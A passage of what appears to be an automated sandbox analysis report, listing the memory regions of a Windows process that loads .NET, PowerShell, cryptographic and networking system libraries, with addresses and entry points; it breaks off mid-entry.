region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 399 start_va = 0x756b0000 end_va = 0x756c8fff monitored = 0 entry_point = 0x756b1319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 400 start_va = 0xc90000 end_va = 0xccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 401 start_va = 0x70b00000 end_va = 0x70b0afff monitored = 0 entry_point = 0x70b01200 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 402 start_va = 0x7ffdc000 end_va = 0x7ffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 403 start_va = 0x73bc0000 end_va = 0x73bc9fff monitored = 0 entry_point = 0x73bc4d20 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 404 start_va = 0x752d0000 end_va = 0x752e6fff monitored = 0 entry_point = 0x752d3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 405 start_va = 0x5c0000 end_va = 0x5fbfff monitored = 0 entry_point = 0x5c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 406 start_va = 0x5c0000 end_va = 0x5fbfff monitored = 0 entry_point = 0x5c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 407 start_va = 0x5c0000 end_va = 0x5fbfff monitored = 0 entry_point = 0x5c128d region_type = mapped_file 
name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 408 start_va = 0x5c0000 end_va = 0x5fbfff monitored = 0 entry_point = 0x5c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 409 start_va = 0x5c0000 end_va = 0x5fbfff monitored = 0 entry_point = 0x5c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 410 start_va = 0x75070000 end_va = 0x750aafff monitored = 0 entry_point = 0x7507128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 411 start_va = 0x6c430000 end_va = 0x6c4bcfff monitored = 1 entry_point = 0x6c442860 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 412 start_va = 0x71990000 end_va = 0x71992fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 413 start_va = 0x74d50000 end_va = 0x74d58fff monitored = 0 entry_point = 0x74d51220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 414 start_va = 0x69490000 end_va = 0x69c3efff monitored = 1 entry_point = 0x694ad0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 415 start_va = 0x68ce0000 end_va = 
0x6948efff monitored = 1 entry_point = 0x68cfd0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 416 start_va = 0x69490000 end_va = 0x69c3efff monitored = 1 entry_point = 0x694ad0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 417 start_va = 0x70790000 end_va = 0x707a3fff monitored = 0 entry_point = 0x7079ac00 region_type = mapped_file name = "vcruntime140_clr0400.dll" filename = "\\Windows\\System32\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\system32\\vcruntime140_clr0400.dll") Region: id = 418 start_va = 0x6c2f0000 end_va = 0x6c39afff monitored = 0 entry_point = 0x6c385f20 region_type = mapped_file name = "ucrtbase_clr0400.dll" filename = "\\Windows\\System32\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\system32\\ucrtbase_clr0400.dll") Region: id = 419 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 420 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 421 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 422 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 423 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 424 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private 
name = "private_0x00000000005e0000" filename = "" Region: id = 425 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 426 start_va = 0xb50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 427 start_va = 0xc10000 end_va = 0xc10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 428 start_va = 0xc20000 end_va = 0xc6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 429 start_va = 0x19f0000 end_va = 0x1adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019f0000" filename = "" Region: id = 430 start_va = 0xd20000 end_va = 0xd5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 431 start_va = 0x7ffdb000 end_va = 0x7ffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 432 start_va = 0xc20000 end_va = 0xc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 433 start_va = 0xc30000 end_va = 0xc6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 434 start_va = 0x1ae0000 end_va = 0x3adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ae0000" filename = "" Region: id = 435 start_va = 0xc70000 end_va = 0xc8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 436 start_va = 0x1a20000 end_va = 0x1a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a20000" filename = "" Region: id = 437 start_va = 
0x1aa0000 end_va = 0x1adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001aa0000" filename = "" Region: id = 438 start_va = 0x7ffda000 end_va = 0x7ffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 439 start_va = 0x68080000 end_va = 0x6948afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll") Region: id = 440 start_va = 0xc20000 end_va = 0xc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 441 start_va = 0x3ae0000 end_va = 0x3c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ae0000" filename = "" Region: id = 442 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 443 start_va = 0x67620000 end_va = 0x68074fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll") Region: id = 444 start_va = 0x66e00000 end_va = 0x67617fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll") Region: id = 445 start_va = 0x6c260000 end_va 
= 0x6c2eefff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Pb378ec07#\\d254c63bedcb76c81c3125bd527b7d1a\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.pb378ec07#\\d254c63bedcb76c81c3125bd527b7d1a\\microsoft.powershell.consolehost.ni.dll") Region: id = 446 start_va = 0x65310000 end_va = 0x66df2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Manaa57fc8cc#\\73a1a80aed03e789a49cec899b7505dd\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.manaa57fc8cc#\\73a1a80aed03e789a49cec899b7505dd\\system.management.automation.ni.dll") Region: id = 447 start_va = 0x3ae0000 end_va = 0x3b41fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll") Region: id = 448 start_va = 0x3be0000 end_va = 0x3c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003be0000" filename = "" Region: id = 449 start_va = 0x3d10000 end_va = 0x3d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d10000" filename = "" Region: id = 450 start_va = 0x7ffd9000 end_va = 0x7ffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 451 start_va = 0x3ba0000 end_va = 0x3bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ba0000" filename = "" Region: id = 452 start_va = 0x70770000 end_va = 0x70782fff monitored = 1 entry_point = 0x7077d900 region_type = mapped_file name = "nlssorting.dll" 
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\nlssorting.dll") Region: id = 453 start_va = 0x7ffd8000 end_va = 0x7ffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 454 start_va = 0x64c00000 end_va = 0x6530bfff monitored = 1 entry_point = 0x6521f38e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 455 start_va = 0x644f0000 end_va = 0x64bfbfff monitored = 1 entry_point = 0x64b0f38e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 456 start_va = 0x3d50000 end_va = 0x4021fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nlp" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\sortdefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp") Region: id = 457 start_va = 0x3c20000 end_va = 0x3cdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 458 start_va = 0x64c00000 end_va = 0x6530bfff monitored = 1 entry_point = 0x6521f38e region_type = mapped_file name = 
"system.management.automation.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 459 start_va = 0x644f0000 end_va = 0x64bfbfff monitored = 1 entry_point = 0x64b0f38e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 460 start_va = 0x4030000 end_va = 0x40effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 461 start_va = 0x75920000 end_va = 0x7594efff monitored = 0 entry_point = 0x75922a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 462 start_va = 0x75950000 end_va = 0x75a70fff monitored = 0 entry_point = 0x7595158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 463 start_va = 0x75880000 end_va = 0x7588bfff monitored = 0 entry_point = 0x7588238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 464 start_va = 0x76120000 end_va = 0x76124fff monitored = 0 entry_point = 0x76121438 region_type = mapped_file name = "psapi.dll" filename = 
"\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 465 start_va = 0x41a0000 end_va = 0x41dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041a0000" filename = "" Region: id = 466 start_va = 0x7ffd6000 end_va = 0x7ffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 467 start_va = 0xce0000 end_va = 0xce7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 468 start_va = 0x707e0000 end_va = 0x707e7fff monitored = 0 entry_point = 0x707e3bf5 region_type = mapped_file name = "msisip.dll" filename = "\\Windows\\System32\\msisip.dll" (normalized: "c:\\windows\\system32\\msisip.dll") Region: id = 469 start_va = 0x41e0000 end_va = 0x45dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041e0000" filename = "" Region: id = 470 start_va = 0xcf0000 end_va = 0xcf7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 471 start_va = 0x41e0000 end_va = 0x45dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041e0000" filename = "" Region: id = 472 start_va = 0x4200000 end_va = 0x423ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" 
Region: id = 473 start_va = 0x702d0000 end_va = 0x702e5fff monitored = 0 entry_point = 0x702d13df region_type = mapped_file name = "wshext.dll" filename = "\\Windows\\System32\\wshext.dll" (normalized: "c:\\windows\\system32\\wshext.dll") Region: id = 474 start_va = 0x7ffd5000 end_va = 0x7ffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 475 start_va = 0x6c3a0000 end_va = 0x6c423fff monitored = 0 entry_point = 0x6c3a19a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 476 start_va = 0x3c20000 end_va = 0x3cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c20000" filename = "" Region: id = 477 start_va = 0x6fb60000 end_va = 0x6fb69fff monitored = 0 entry_point = 0x6fb64ab0 region_type = mapped_file name = "pwrshsip.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\pwrshsip.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\pwrshsip.dll") Region: id = 478 start_va = 0x1a60000 end_va = 0x1a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a60000" filename = "" Region: id = 479 start_va = 0x7ffd4000 end_va = 0x7ffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 480 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 481 start_va = 0xcf0000 end_va = 0xcf0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") 
Region: id = 482 start_va = 0xd00000 end_va = 0xd06fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 483 start_va = 0xcf0000 end_va = 0xcf0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 484 start_va = 0xd00000 end_va = 0xd06fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 485 start_va = 0xcf0000 end_va = 0xcf0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 486 start_va = 0xcf0000 end_va = 0xcf6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 487 start_va = 0xcf0000 end_va = 0xcf0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 488 start_va = 0xcf0000 end_va = 0xcf6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 489 start_va = 0xcf0000 end_va = 0xcf0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 490 start_va = 0xcf0000 end_va = 0xcf6fff monitored = 0 entry_point = 0x0 
region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 491 start_va = 0x3c50000 end_va = 0x3c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c50000" filename = "" Region: id = 492 start_va = 0x3cd0000 end_va = 0x3cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cd0000" filename = "" Region: id = 493 start_va = 0x7ffd3000 end_va = 0x7ffd3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 494 start_va = 0x4340000 end_va = 0x437ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004340000" filename = "" Region: id = 495 start_va = 0x7ffaf000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 496 start_va = 0x64af0000 end_va = 0x65309fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Data\\df2dd09ed7c341842a104e1e668f184e\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.data\\df2dd09ed7c341842a104e1e668f184e\\system.data.ni.dll") Region: id = 497 start_va = 0x6bf00000 end_va = 0x6c253fff monitored = 1 entry_point = 0x6c237a72 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 498 start_va = 0x76000000 end_va = 0x76034fff monitored = 0 entry_point = 0x7600145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: 
"c:\\windows\\system32\\ws2_32.dll") Region: id = 499 start_va = 0x75f90000 end_va = 0x75f95fff monitored = 0 entry_point = 0x75f91782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 500 start_va = 0x4380000 end_va = 0x46d0fff monitored = 1 entry_point = 0x46b7a72 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 501 start_va = 0x4380000 end_va = 0x46d0fff monitored = 1 entry_point = 0x46b7a72 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 502 start_va = 0x4380000 end_va = 0x46d0fff monitored = 1 entry_point = 0x46b7a72 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 503 start_va = 0x4380000 end_va = 0x46d0fff monitored = 1 entry_point = 0x46b7a72 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 504 start_va = 0xcf0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 505 start_va 
= 0x64370000 end_va = 0x64ae3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll") Region: id = 506 start_va = 0x6bdd0000 end_va = 0x6befffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\e114780fd3ea5727401c06ea4f22ef35\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\e114780fd3ea5727401c06ea4f22ef35\\system.management.ni.dll") Region: id = 507 start_va = 0x6a3f0000 end_va = 0x6a51bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Dired13b18a9#\\2e76676fbd265f70be92c82bbf76b8e5\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.dired13b18a9#\\2e76676fbd265f70be92c82bbf76b8e5\\system.directoryservices.ni.dll") Region: id = 508 start_va = 0x707d0000 end_va = 0x707d2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-xstate-l2-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-xstate-l2-1-0.dll") Region: id = 509 start_va = 0x6a360000 end_va = 0x6a3e8fff monitored = 1 entry_point = 0x6a361130 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll") Region: id = 510 start_va = 0xd00000 end_va = 0xd0ffff monitored = 1 entry_point = 0x0 region_type = private name = 
"private_0x0000000000d00000" filename = "" Region: id = 511 start_va = 0xd10000 end_va = 0xd1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 512 start_va = 0x6bd70000 end_va = 0x6bdc3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.P6f792626#\\05765f777020deeddc8ad54b48343b9c\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.p6f792626#\\05765f777020deeddc8ad54b48343b9c\\microsoft.powershell.security.ni.dll") Region: id = 513 start_va = 0x40f0000 end_va = 0x412ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 514 start_va = 0x7ffd8000 end_va = 0x7ffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 515 start_va = 0x6a2a0000 end_va = 0x6a357fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Transactions\\3d760b4a3260a41ef84a3fd866780980\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.transactions\\3d760b4a3260a41ef84a3fd866780980\\system.transactions.ni.dll") Region: id = 516 start_va = 0x6abc0000 end_va = 0x6ac0bfff monitored = 1 entry_point = 0x6abdfcc6 region_type = mapped_file name = "system.transactions.dll" filename = 